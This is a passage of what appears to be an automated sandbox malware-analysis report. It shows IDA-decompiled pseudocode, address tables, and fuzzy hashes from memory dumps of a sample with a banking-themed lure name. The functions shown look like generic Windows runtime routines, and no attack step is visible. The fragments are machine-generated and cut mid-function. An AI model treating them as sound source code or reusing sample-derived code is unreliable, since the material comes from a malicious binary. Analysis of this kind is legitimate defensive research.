                                                                    									_t100 =  *0x7ffe0008;
                                                                    									if(_t105 ==  *_t114) {
                                                                    										goto L8;
                                                                    									}
                                                                    									asm("pause");
                                                                    								}
                                                                    								L8:
                                                                    								_t89 = 0x7ffe03b0;
                                                                    								_t115 =  *0x7ffe03b0;
                                                                    								_t82 =  *0x7FFE03B4;
                                                                    								_v60 = _t115;
                                                                    								_t114 = 0x7ffe0010;
                                                                    								_v56 = _t82;
                                                                    							} while (_v72 != _t115 || _v76 != _t82);
                                                                    							_t83 =  *0x1988628; // 0x0
                                                                    							_t116 =  *0x198862c; // 0x0
                                                                    							_v76 = _t116;
                                                                    							_t117 = _v68;
                                                                    						} while (_t117 != _t83 || _v64 != _v76);
                                                                    						asm("sbb edx, [esp+0x24]");
                                                                    						_t102 = _t100 - _v60 - _t117;
                                                                    						_t112 = _v48;
                                                                    						_t91 = _v44;
                                                                    						asm("sbb edx, eax");
                                                                    						_t130 = _t105 - _v52;
                                                                    						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
                                                                    							_t88 = _t102 - _t91;
                                                                    							asm("sbb edx, edi");
                                                                    							_t108 = _t105;
                                                                    						} else {
                                                                    							_t88 = 0;
                                                                    							_t108 = 0;
                                                                    						}
                                                                    						goto L16;
                                                                    					}
                                                                    				} else {
                                                                    					if( *(_t112 + 0x44) == _t60) {
                                                                    						goto L20;
                                                                    					}
                                                                    					goto L3;
                                                                    				}
                                                                    			}
















































                                                                    0x018bb94c
                                                                    0x018bb956
                                                                    0x018bb95c
                                                                    0x018bb95e
                                                                    0x018bb964
                                                                    0x018bb969
                                                                    0x018bb96d
                                                                    0x018bb96d
                                                                    0x018bb970
                                                                    0x018bb974
                                                                    0x018bb97a
                                                                    0x018bbadf
                                                                    0x018bbadf
                                                                    0x018bbae2
                                                                    0x018bbae4
                                                                    0x018bbae6
                                                                    0x018bbaf0
                                                                    0x01902cb8
                                                                    0x018bbaf6
                                                                    0x018bbaf6
                                                                    0x018bbaf6
                                                                    0x018bbafd
                                                                    0x018bbb1f
                                                                    0x018bbb1f
                                                                    0x018bbaff
                                                                    0x018bbb00
                                                                    0x018bbb00
                                                                    0x018bbb03
                                                                    0x018bbb03
                                                                    0x018bbacb
                                                                    0x018bbacf
                                                                    0x018bbad0
                                                                    0x018bbad1
                                                                    0x018bbadc
                                                                    0x018bbadc
                                                                    0x018bb980
                                                                    0x018bb980
                                                                    0x018bb988
                                                                    0x018bb98b
                                                                    0x018bb98d
                                                                    0x018bb990
                                                                    0x018bb993
                                                                    0x018bb999
                                                                    0x018bb99b
                                                                    0x018bb9a1
                                                                    0x018bb9a5
                                                                    0x018bb9aa
                                                                    0x018bb9b0
                                                                    0x018bb9bb
                                                                    0x018bb9c0
                                                                    0x018bb9c3
                                                                    0x018bb9ca
                                                                    0x018bb9cc
                                                                    0x018bb9cf
                                                                    0x018bb9d3
                                                                    0x018bb9d7
                                                                    0x018bba94
                                                                    0x018bba94
                                                                    0x018bba98
                                                                    0x018bbaa3
                                                                    0x01902ccb
                                                                    0x018bbaa9
                                                                    0x018bbaa9
                                                                    0x018bbaa9
                                                                    0x018bbab1
                                                                    0x01902cd5
                                                                    0x01902cdd
                                                                    0x01902cdd
                                                                    0x018bbabb
                                                                    0x018bbabc
                                                                    0x018bbac2
                                                                    0x018bbac3
                                                                    0x018bbac3
                                                                    0x018bbac6
                                                                    0x00000000
                                                                    0x018bb9dd
                                                                    0x018bb9dd
                                                                    0x018bb9e7
                                                                    0x018bb9e7
                                                                    0x018bb9ec
                                                                    0x018bb9ec
                                                                    0x018bb9f1
                                                                    0x018bb9f5
                                                                    0x018bb9fa
                                                                    0x018bba00
                                                                    0x018bba0c
                                                                    0x018bba10
                                                                    0x018bba10
                                                                    0x018bba12
                                                                    0x018bba18
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018bbb26
                                                                    0x018bbb26
                                                                    0x018bba1e
                                                                    0x018bba1e
                                                                    0x018bba23
                                                                    0x018bba25
                                                                    0x018bba2c
                                                                    0x018bba30
                                                                    0x018bba35
                                                                    0x018bba35
                                                                    0x018bba41
                                                                    0x018bba46
                                                                    0x018bba4c
                                                                    0x018bba50
                                                                    0x018bba54
                                                                    0x018bba6a
                                                                    0x018bba6e
                                                                    0x018bba70
                                                                    0x018bba74
                                                                    0x018bba78
                                                                    0x018bba7a
                                                                    0x018bba7c
                                                                    0x018bba8e
                                                                    0x018bba90
                                                                    0x018bba92
                                                                    0x018bbb14
                                                                    0x018bbb14
                                                                    0x018bbb16
                                                                    0x018bbb16
                                                                    0x00000000
                                                                    0x018bba7c
                                                                    0x018bbb0a
                                                                    0x018bbb0d
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018bbb0f

                                                                    APIs
                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 018BB9A5
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                                    • String ID:
                                                                    • API String ID: 885266447-0
                                                                    • Opcode ID: 4b7aa5d930aed810797930845a6b976a3a2ae0b66c324b35507bb105fef904ca
                                                                    • Instruction ID: 8db232d556e0cebf4fde681842c3f093cdae240f07d6bca3b571462d14bf3075
                                                                    • Opcode Fuzzy Hash: 4b7aa5d930aed810797930845a6b976a3a2ae0b66c324b35507bb105fef904ca
                                                                    • Instruction Fuzzy Hash: A0515671A09341CFC721CF2CC4C092ABBE9BB88714F54896EEA95D7355D770EA44CB92
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 78%
                                                                    			E0189B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
                                                                    				signed int _t65;
                                                                    				signed short _t69;
                                                                    				intOrPtr _t70;
                                                                    				signed short _t85;
                                                                    				void* _t86;
                                                                    				signed short _t89;
                                                                    				signed short _t91;
                                                                    				intOrPtr _t92;
                                                                    				intOrPtr _t97;
                                                                    				intOrPtr* _t98;
                                                                    				signed short _t99;
                                                                    				signed short _t101;
                                                                    				void* _t102;
                                                                    				char* _t103;
                                                                    				signed short _t104;
                                                                    				intOrPtr* _t110;
                                                                    				void* _t111;
                                                                    				void* _t114;
                                                                    				intOrPtr* _t115;
                                                                    
                                                                    				_t109 = __esi;
                                                                    				_t108 = __edi;
                                                                    				_t106 = __edx;
                                                                    				_t95 = __ebx;
                                                                    				_push(0x90);
                                                                    				_push(0x196f7a8);
                                                                    				E018ED0E8(__ebx, __edi, __esi);
                                                                    				 *((intOrPtr*)(_t114 - 0x9c)) = __edx;
                                                                    				 *((intOrPtr*)(_t114 - 0x84)) = __ecx;
                                                                    				 *((intOrPtr*)(_t114 - 0x8c)) =  *((intOrPtr*)(_t114 + 0xc));
                                                                    				 *((intOrPtr*)(_t114 - 0x88)) =  *((intOrPtr*)(_t114 + 0x10));
                                                                    				 *((intOrPtr*)(_t114 - 0x78)) =  *[fs:0x18];
                                                                    				if(__edx == 0xffffffff) {
                                                                    					L6:
                                                                    					_t97 =  *((intOrPtr*)(_t114 - 0x78));
                                                                    					_t65 =  *(_t97 + 0xfca) & 0x0000ffff;
                                                                    					__eflags = _t65 & 0x00000002;
                                                                    					if((_t65 & 0x00000002) != 0) {
                                                                    						L3:
                                                                    						L4:
                                                                    						return E018ED130(_t95, _t108, _t109);
                                                                    					}
                                                                    					 *(_t97 + 0xfca) = _t65 | 0x00000002;
                                                                    					_t108 = 0;
                                                                    					_t109 = 0;
                                                                    					_t95 = 0;
                                                                    					__eflags = 0;
                                                                    					while(1) {
                                                                    						__eflags = _t95 - 0x200;
                                                                    						if(_t95 >= 0x200) {
                                                                    							break;
                                                                    						}
                                                                    						E018DD000(0x80);
                                                                    						 *((intOrPtr*)(_t114 - 0x18)) = _t115;
                                                                    						_t108 = _t115;
                                                                    						_t95 = _t95 - 0xffffff80;
                                                                    						_t17 = _t114 - 4;
                                                                    						 *_t17 =  *(_t114 - 4) & 0x00000000;
                                                                    						__eflags =  *_t17;
                                                                    						_t106 =  *((intOrPtr*)(_t114 - 0x84));
                                                                    						_t110 =  *((intOrPtr*)(_t114 - 0x84));
                                                                    						_t102 = _t110 + 1;
                                                                    						do {
                                                                    							_t85 =  *_t110;
                                                                    							_t110 = _t110 + 1;
                                                                    							__eflags = _t85;
                                                                    						} while (_t85 != 0);
                                                                    						_t111 = _t110 - _t102;
                                                                    						_t21 = _t95 - 1; // -129
                                                                    						_t86 = _t21;
                                                                    						__eflags = _t111 - _t86;
                                                                    						if(_t111 > _t86) {
                                                                    							_t111 = _t86;
                                                                    						}
                                                                    						E018DF3E0(_t108, _t106, _t111);
                                                                    						_t115 = _t115 + 0xc;
                                                                    						_t103 = _t111 + _t108;
                                                                    						 *((intOrPtr*)(_t114 - 0x80)) = _t103;
                                                                    						_t89 = _t95 - _t111;
                                                                    						__eflags = _t89;
                                                                    						_push(0);
                                                                    						if(_t89 == 0) {
                                                                    							L15:
                                                                    							_t109 = 0xc000000d;
                                                                    							goto L16;
                                                                    						} else {
                                                                    							__eflags = _t89 - 0x7fffffff;
                                                                    							if(_t89 <= 0x7fffffff) {
                                                                    								L16:
                                                                    								 *(_t114 - 0x94) = _t109;
                                                                    								__eflags = _t109;
                                                                    								if(_t109 < 0) {
                                                                    									__eflags = _t89;
                                                                    									if(_t89 != 0) {
                                                                    										 *_t103 = 0;
                                                                    									}
                                                                    									L26:
                                                                    									 *(_t114 - 0xa0) = _t109;
                                                                    									 *(_t114 - 4) = 0xfffffffe;
                                                                    									__eflags = _t109;
                                                                    									if(_t109 >= 0) {
                                                                    										L31:
                                                                    										_t98 = _t108;
                                                                    										_t39 = _t98 + 1; // 0x1
                                                                    										_t106 = _t39;
                                                                    										do {
                                                                    											_t69 =  *_t98;
                                                                    											_t98 = _t98 + 1;
                                                                    											__eflags = _t69;
                                                                    										} while (_t69 != 0);
                                                                    										_t99 = _t98 - _t106;
                                                                    										__eflags = _t99;
                                                                    										L34:
                                                                    										_t70 =  *[fs:0x30];
                                                                    										__eflags =  *((char*)(_t70 + 2));
                                                                    										if( *((char*)(_t70 + 2)) != 0) {
                                                                    											L40:
                                                                    											 *((intOrPtr*)(_t114 - 0x74)) = 0x40010006;
                                                                    											 *(_t114 - 0x6c) =  *(_t114 - 0x6c) & 0x00000000;
                                                                    											 *((intOrPtr*)(_t114 - 0x64)) = 2;
                                                                    											 *(_t114 - 0x70) =  *(_t114 - 0x70) & 0x00000000;
                                                                    											 *((intOrPtr*)(_t114 - 0x60)) = (_t99 & 0x0000ffff) + 1;
                                                                    											 *((intOrPtr*)(_t114 - 0x5c)) = _t108;
                                                                    											 *(_t114 - 4) = 1;
                                                                    											_push(_t114 - 0x74);
                                                                    											E018EDEF0(_t99, _t106);
                                                                    											 *(_t114 - 4) = 0xfffffffe;
                                                                    											 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                                    											goto L3;
                                                                    										}
                                                                    										__eflags = ( *0x7ffe02d4 & 0x00000003) - 3;
                                                                    										if(( *0x7ffe02d4 & 0x00000003) != 3) {
                                                                    											goto L40;
                                                                    										}
                                                                    										_push( *((intOrPtr*)(_t114 + 8)));
                                                                    										_push( *((intOrPtr*)(_t114 - 0x9c)));
                                                                    										_push(_t99 & 0x0000ffff);
                                                                    										_push(_t108);
                                                                    										_push(1);
                                                                    										_t101 = E018DB280();
                                                                    										__eflags =  *((char*)(_t114 + 0x14)) - 1;
                                                                    										if( *((char*)(_t114 + 0x14)) == 1) {
                                                                    											__eflags = _t101 - 0x80000003;
                                                                    											if(_t101 == 0x80000003) {
                                                                    												E018DB7E0(1);
                                                                    												_t101 = 0;
                                                                    												__eflags = 0;
                                                                    											}
                                                                    										}
                                                                    										 *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) =  *( *((intOrPtr*)(_t114 - 0x78)) + 0xfca) & 0x0000fffd;
                                                                    										goto L4;
                                                                    									}
                                                                    									__eflags = _t109 - 0x80000005;
                                                                    									if(_t109 == 0x80000005) {
                                                                    										continue;
                                                                    									}
                                                                    									break;
                                                                    								}
                                                                    								 *(_t114 - 0x90) = 0;
                                                                    								 *((intOrPtr*)(_t114 - 0x7c)) = _t89 - 1;
                                                                    								_t91 = E018DE2D0(_t103, _t89 - 1,  *((intOrPtr*)(_t114 - 0x8c)),  *((intOrPtr*)(_t114 - 0x88)));
                                                                    								_t115 = _t115 + 0x10;
                                                                    								_t104 = _t91;
                                                                    								_t92 =  *((intOrPtr*)(_t114 - 0x7c));
                                                                    								__eflags = _t104;
                                                                    								if(_t104 < 0) {
                                                                    									L21:
                                                                    									_t109 = 0x80000005;
                                                                    									 *(_t114 - 0x90) = 0x80000005;
                                                                    									L22:
                                                                    									 *((char*)(_t92 +  *((intOrPtr*)(_t114 - 0x80)))) = 0;
                                                                    									L23:
                                                                    									 *(_t114 - 0x94) = _t109;
                                                                    									goto L26;
                                                                    								}
                                                                    								__eflags = _t104 - _t92;
                                                                    								if(__eflags > 0) {
                                                                    									goto L21;
                                                                    								}
                                                                    								if(__eflags == 0) {
                                                                    									goto L22;
                                                                    								}
                                                                    								goto L23;
                                                                    							}
                                                                    							goto L15;
                                                                    						}
                                                                    					}
                                                                    					__eflags = _t109;
                                                                    					if(_t109 >= 0) {
                                                                    						goto L31;
                                                                    					}
                                                                    					__eflags = _t109 - 0x80000005;
                                                                    					if(_t109 != 0x80000005) {
                                                                    						goto L31;
                                                                    					}
                                                                    					 *((short*)(_t95 + _t108 - 2)) = 0xa;
                                                                    					_t38 = _t95 - 1; // -129
                                                                    					_t99 = _t38;
                                                                    					goto L34;
                                                                    				}
                                                                    				if( *((char*)( *[fs:0x30] + 2)) != 0) {
                                                                    					__eflags = __edx - 0x65;
                                                                    					if(__edx != 0x65) {
                                                                    						goto L2;
                                                                    					}
                                                                    					goto L6;
                                                                    				}
                                                                    				L2:
                                                                    				_push( *((intOrPtr*)(_t114 + 8)));
                                                                    				_push(_t106);
                                                                    				if(E018DA890() != 0) {
                                                                    					goto L6;
                                                                    				}
                                                                    				goto L3;
                                                                    			}






















                                                                    0x0189b171
                                                                    0x0189b171
                                                                    0x0189b171
                                                                    0x0189b171
                                                                    0x0189b171
                                                                    0x0189b176
                                                                    0x0189b17b
                                                                    0x0189b180
                                                                    0x0189b186
                                                                    0x0189b18f
                                                                    0x0189b198
                                                                    0x0189b1a4
                                                                    0x0189b1aa
                                                                    0x018f4802
                                                                    0x018f4802
                                                                    0x018f4805
                                                                    0x018f480c
                                                                    0x018f480e
                                                                    0x0189b1d1
                                                                    0x0189b1d3
                                                                    0x0189b1de
                                                                    0x0189b1de
                                                                    0x018f4817
                                                                    0x018f481e
                                                                    0x018f4820
                                                                    0x018f4822
                                                                    0x018f4822
                                                                    0x018f4824
                                                                    0x018f4824
                                                                    0x018f482a
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018f4835
                                                                    0x018f483a
                                                                    0x018f483d
                                                                    0x018f483f
                                                                    0x018f4842
                                                                    0x018f4842
                                                                    0x018f4842
                                                                    0x018f4846
                                                                    0x018f484c
                                                                    0x018f484e
                                                                    0x018f4851
                                                                    0x018f4851
                                                                    0x018f4853
                                                                    0x018f4854
                                                                    0x018f4854
                                                                    0x018f4858
                                                                    0x018f485a
                                                                    0x018f485a
                                                                    0x018f485d
                                                                    0x018f485f
                                                                    0x018f4861
                                                                    0x018f4861
                                                                    0x018f4866
                                                                    0x018f486b
                                                                    0x018f486e
                                                                    0x018f4871
                                                                    0x018f4876
                                                                    0x018f4876
                                                                    0x018f4878
                                                                    0x018f487b
                                                                    0x018f4884
                                                                    0x018f4884
                                                                    0x00000000
                                                                    0x018f487d
                                                                    0x018f487d
                                                                    0x018f4882
                                                                    0x018f4889
                                                                    0x018f4889
                                                                    0x018f488f
                                                                    0x018f4891
                                                                    0x018f48e0
                                                                    0x018f48e2
                                                                    0x018f48e4
                                                                    0x018f48e4
                                                                    0x018f48e7
                                                                    0x018f48e7
                                                                    0x018f48ed
                                                                    0x018f48f4
                                                                    0x018f48f6
                                                                    0x018f4951
                                                                    0x018f4951
                                                                    0x018f4953
                                                                    0x018f4953
                                                                    0x018f4956
                                                                    0x018f4956
                                                                    0x018f4958
                                                                    0x018f4959
                                                                    0x018f4959
                                                                    0x018f495d
                                                                    0x018f495d
                                                                    0x018f495f
                                                                    0x018f495f
                                                                    0x018f4965
                                                                    0x018f4969
                                                                    0x018f49ba
                                                                    0x018f49ba
                                                                    0x018f49c1
                                                                    0x018f49c5
                                                                    0x018f49cc
                                                                    0x018f49d4
                                                                    0x018f49d7
                                                                    0x018f49da
                                                                    0x018f49e4
                                                                    0x018f49e5
                                                                    0x018f49f3
                                                                    0x018f4a02
                                                                    0x00000000
                                                                    0x018f4a02
                                                                    0x018f4972
                                                                    0x018f4974
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018f4976
                                                                    0x018f4979
                                                                    0x018f4982
                                                                    0x018f4983
                                                                    0x018f4984
                                                                    0x018f498b
                                                                    0x018f498d
                                                                    0x018f4991
                                                                    0x018f4993
                                                                    0x018f4999
                                                                    0x018f499d
                                                                    0x018f49a2
                                                                    0x018f49a2
                                                                    0x018f49a2
                                                                    0x018f4999
                                                                    0x018f49ac
                                                                    0x00000000
                                                                    0x018f49b3
                                                                    0x018f48f8
                                                                    0x018f48fe
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018f48fe
                                                                    0x018f4895
                                                                    0x018f489c
                                                                    0x018f48ad
                                                                    0x018f48b2
                                                                    0x018f48b5
                                                                    0x018f48b7
                                                                    0x018f48ba
                                                                    0x018f48bc
                                                                    0x018f48c6
                                                                    0x018f48c6
                                                                    0x018f48cb
                                                                    0x018f48d1
                                                                    0x018f48d4
                                                                    0x018f48d8
                                                                    0x018f48d8
                                                                    0x00000000
                                                                    0x018f48d8
                                                                    0x018f48be
                                                                    0x018f48c0
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018f48c2
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018f48c4
                                                                    0x00000000
                                                                    0x018f4882
                                                                    0x018f487b
                                                                    0x018f4904
                                                                    0x018f4906
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018f4908
                                                                    0x018f490e
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018f4910
                                                                    0x018f4917
                                                                    0x018f4917
                                                                    0x00000000
                                                                    0x018f4917
                                                                    0x0189b1ba
                                                                    0x018f47f9
                                                                    0x018f47fc
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018f47fc
                                                                    0x0189b1c0
                                                                    0x0189b1c0
                                                                    0x0189b1c3
                                                                    0x0189b1cb
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID: _vswprintf_s
                                                                    • String ID:
                                                                    • API String ID: 677850445-0
                                                                    • Opcode ID: a1deb46512004531d8a19ad2b76ebba8543023af1ba3f42bb1a96fe29dffe9cc
                                                                    • Instruction ID: ce5285865a2780fa3f1b0083e058a57bce231662fac3dd41bdef87bd2afef046
                                                                    • Opcode Fuzzy Hash: a1deb46512004531d8a19ad2b76ebba8543023af1ba3f42bb1a96fe29dffe9cc
                                                                    • Instruction Fuzzy Hash: B851E171E1025A8EDF35CF68C844BAEBBB0AF01714F1442AEDA59EB292D7704A45CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 58%
                                                                    			E018D4A2C(signed int* __ecx, intOrPtr* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                    				signed int _v8;
                                                                    				signed int* _v12;
                                                                    				char _v13;
                                                                    				signed int _v16;
                                                                    				char _v21;
                                                                    				signed int* _v24;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				signed int _t29;
                                                                    				signed int* _t32;
                                                                    				signed int* _t41;
                                                                    				signed int _t42;
                                                                    				void* _t43;
                                                                    				intOrPtr* _t51;
                                                                    				void* _t52;
                                                                    				signed int _t53;
                                                                    				signed int _t58;
                                                                    				void* _t59;
                                                                    				signed int _t60;
                                                                    				signed int _t62;
                                                                    
                                                                    				_t49 = __edx;
                                                                    				_t62 = (_t60 & 0xfffffff8) - 0xc;
                                                                    				_t26 =  *0x198d360 ^ _t62;
                                                                    				_v8 =  *0x198d360 ^ _t62;
                                                                    				_t41 = __ecx;
                                                                    				_t51 = __edx;
                                                                    				_v12 = __ecx;
                                                                    				if(_a4 == 0) {
                                                                    					if(_a8 != 0) {
                                                                    						goto L1;
                                                                    					}
                                                                    					_v13 = 1;
                                                                    					E018B2280(_t26, 0x1988608);
                                                                    					_t58 =  *_t41;
                                                                    					if(_t58 == 0) {
                                                                    						L11:
                                                                    						E018AFFB0(_t41, _t51, 0x1988608);
                                                                    						L2:
                                                                    						 *0x198b1e0(_a4, _a8);
                                                                    						_t42 =  *_t51();
                                                                    						if(_t42 == 0) {
                                                                    							_t29 = 0;
                                                                    							L5:
                                                                    							_pop(_t52);
                                                                    							_pop(_t59);
                                                                    							_pop(_t43);
                                                                    							return E018DB640(_t29, _t43, _v16 ^ _t62, _t49, _t52, _t59);
                                                                    						}
                                                                    						 *((intOrPtr*)(_t42 + 0x34)) = 1;
                                                                    						if(_v21 != 0) {
                                                                    							_t53 = 0;
                                                                    							E018B2280(_t28, 0x1988608);
                                                                    							_t32 = _v24;
                                                                    							if( *_t32 == _t58) {
                                                                    								 *_t32 = _t42;
                                                                    								 *((intOrPtr*)(_t42 + 0x34)) =  *((intOrPtr*)(_t42 + 0x34)) + 1;
                                                                    								if(_t58 != 0) {
                                                                    									 *(_t58 + 0x34) =  *(_t58 + 0x34) - 1;
                                                                    									asm("sbb edi, edi");
                                                                    									_t53 =  !( ~( *(_t58 + 0x34))) & _t58;
                                                                    								}
                                                                    							}
                                                                    							E018AFFB0(_t42, _t53, 0x1988608);
                                                                    							if(_t53 != 0) {
                                                                    								L018B77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t53);
                                                                    							}
                                                                    						}
                                                                    						_t29 = _t42;
                                                                    						goto L5;
                                                                    					}
                                                                    					if( *((char*)(_t58 + 0x40)) != 0) {
                                                                    						L10:
                                                                    						 *(_t58 + 0x34) =  *(_t58 + 0x34) + 1;
                                                                    						E018AFFB0(_t41, _t51, 0x1988608);
                                                                    						_t29 = _t58;
                                                                    						goto L5;
                                                                    					}
                                                                    					_t49 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                                                                    					if( *((intOrPtr*)(_t58 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                                                                    						goto L11;
                                                                    					}
                                                                    					goto L10;
                                                                    				}
                                                                    				L1:
                                                                    				_v13 = 0;
                                                                    				_t58 = 0;
                                                                    				goto L2;
                                                                    			}
























                                                                    0x018d4a2c
                                                                    0x018d4a34
                                                                    0x018d4a3c
                                                                    0x018d4a3e
                                                                    0x018d4a48
                                                                    0x018d4a4b
                                                                    0x018d4a4d
                                                                    0x018d4a51
                                                                    0x018d4a9c
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018d4aa3
                                                                    0x018d4aa8
                                                                    0x018d4aad
                                                                    0x018d4ab1
                                                                    0x018d4ade
                                                                    0x018d4ae3
                                                                    0x018d4a5a
                                                                    0x018d4a62
                                                                    0x018d4a6a
                                                                    0x018d4a6e
                                                                    0x0190f203
                                                                    0x018d4a84
                                                                    0x018d4a88
                                                                    0x018d4a89
                                                                    0x018d4a8a
                                                                    0x018d4a95
                                                                    0x018d4a95
                                                                    0x018d4a79
                                                                    0x018d4a80
                                                                    0x018d4af2
                                                                    0x018d4af4
                                                                    0x018d4af9
                                                                    0x018d4aff
                                                                    0x018d4b01
                                                                    0x018d4b03
                                                                    0x018d4b08
                                                                    0x0190f20a
                                                                    0x0190f212
                                                                    0x0190f216
                                                                    0x0190f216
                                                                    0x018d4b08
                                                                    0x018d4b13
                                                                    0x018d4b1a
                                                                    0x0190f229
                                                                    0x0190f229
                                                                    0x018d4b1a
                                                                    0x018d4a82
                                                                    0x00000000
                                                                    0x018d4a82
                                                                    0x018d4ab7
                                                                    0x018d4acd
                                                                    0x018d4acd
                                                                    0x018d4ad5
                                                                    0x018d4ada
                                                                    0x00000000
                                                                    0x018d4ada
                                                                    0x018d4ac2
                                                                    0x018d4acb
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x00000000
                                                                    0x018d4acb
                                                                    0x018d4a53
                                                                    0x018d4a53
                                                                    0x018d4a58
                                                                    0x00000000

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.373517823.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: true
                                                                    • Associated: 00000001.00000002.376129817.000000000198B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    • Associated: 00000001.00000002.376158887.000000000198F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_1870000_Ziraat Bankasi Swift Mesaji20221121.jbxd
                                                                    Similarity
                                                                    • API ID: DebugPrintTimes
                                                                    • String ID:
                                                                    • API String ID: 3446177414-0
                                                                    • Opcode ID: f118349e75d5ef80f1e865ac86579465442a30d2da935df0b21033acafd9f0d5
                                                                    • Instruction ID: 6927a7d1cede0ea7b36809f4d2966ee81a6f73ea98ea8d536711644d67cbd64b
                                                                    • Opcode Fuzzy Hash: f118349e75d5ef80f1e865ac86579465442a30d2da935df0b21033acafd9f0d5
                                                                    • Instruction Fuzzy Hash: BB31F3322053519FD732AF58C980B2ABBE5FFC5714F404429E556DBA81CB70DA00CB96
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    C-Code - Quality: 53%
                                                                    			E018B0050(void* __ecx) {
                                                                    				signed int _v8;
                                                                    				void* __ebx;
                                                                    				void* __edi;
                                                                    				void* __esi;
                                                                    				void* __ebp;
                                                                    				intOrPtr* _t30;
                                                                    				intOrPtr* _t31;
                                                                    				signed int _t34;
                                                                    				void* _t40;
                                                                    				void* _t41;
                                                                    				signed int _t44;
                                                                    				intOrPtr _t47;
                                                                    				signed int _t58;
                                                                    				void* _t59;
                                                                    				void* _t61;
                                                                    				void* _t62;
                                                                    				signed int _t64;
                                                                    
                                                                    				_push(__ecx);
                                                                    				_v8 =  *0x198d360 ^ _t64;
                                                                    				_t61 = __ecx;
                                                                    				_t2 = _t61 + 0x20; // 0x20
                                                                    				E018C9ED0(_t2, 1, 0);
                                                                    				_t52 =  *(_t61 + 0x8c);
                                                                    				_t4 = _t61 + 0x8c; // 0x8c
                                                                    				_t40 = _t4;
                                                                    				do {
                                                                    					_t44 = _t52;
                                                                    					_t58 = _t52 & 0x00000001;
                                                                    					_t24 = _t44;
                                                                    					asm("lock cmpxchg [ebx], edx");
                                                                    					_t52 = _t44;
                                                                    				} while (_t52 != _t44);
                                                                    				if(_t58 == 0) {
                                                                    					L7:
                                                                    					_pop(_t59);
                                                                    					_pop(_t62);
                                                                    					_pop(_t41);
                                                                    					return E018DB640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
                                                                    				}
                                                                    				asm("lock xadd [esi], eax");
                                                                    				_t47 =  *[fs:0x18];
                                                                    				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
                                                                    				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
                                                                    				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                                                    				if(_t30 != 0) {
                                                                    					if( *_t30 == 0) {
                                                                    						goto L4;
                                                                    					}
                                                                    					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                                                    					L5:
                                                                    					if( *_t31 != 0) {
                                                                    						_t18 = _t61 + 0x78; // 0x78
                                                                    						E01968A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
                                                                    					}
                                                                    					_t52 =  *(_t61 + 0x5c);
                                                                    					_t11 = _t61 + 0x78; // 0x78
                                                                    					_t34 = E018C9702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
                                                                    					_t24 = _t34 | 0xffffffff;
                                                                    					asm("lock xadd [esi], eax");
                                                                    					if((_t34 | 0xffffffff) == 0) {
